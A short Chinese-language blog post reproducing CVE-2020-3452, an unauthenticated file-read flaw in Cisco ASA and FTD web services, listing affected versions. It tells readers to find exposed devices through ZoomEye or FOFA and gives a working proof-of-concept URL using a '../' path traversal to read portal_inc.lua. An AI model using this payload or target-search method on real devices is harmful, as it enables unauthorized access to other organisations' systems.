CVE-2020-3452漏洞复现

一、前言

    前端时间碰到了该漏洞,记录一下!


二、漏洞介绍

    该漏洞为思科ASA设备和FTD设备的未授权任意文件读取漏洞,但仅能读取到WEB目录下的文件,影响版本如下:

  • Cisco ASA:<= 9.6

  • Cisco ASA:9.7 , 9.8 , 9.9 , 9.10 , 9.12 , 9.13 , 9.14

  • Cisco FTD:6.2.2 , 6.2.3 , 6.3.0 , 6.4.0 , 6.5.0 , 6.6.0


三、漏洞复现

    首先利用zoomeye或者fofa搜索设备,搜索关键词为/+CSCOE+/,如下图所示:

    POCURL/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../,如下图所示:

posted @ 2021-11-21 20:55  windy_ll  阅读(488)  评论(0编辑  收藏  举报